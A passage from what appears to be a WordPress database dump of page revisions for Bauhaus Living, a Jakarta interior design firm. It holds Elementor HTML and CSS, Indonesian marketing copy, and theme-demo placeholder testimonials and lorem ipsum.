Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:47','2023-09-22 09:58:47','',22,'https://bauhaus.futuremediatrix.com/?p=4916',0,'revision','',0),(4917,3,'2023-09-22 10:01:30','2023-09-22 10:01:30','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:01:30','2023-09-22 10:01:30','',22,'https://bauhaus.futuremediatrix.com/?p=4917',0,'revision','',0),(4918,3,'2023-09-22 10:01:30','2023-09-22 10:01:30','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column 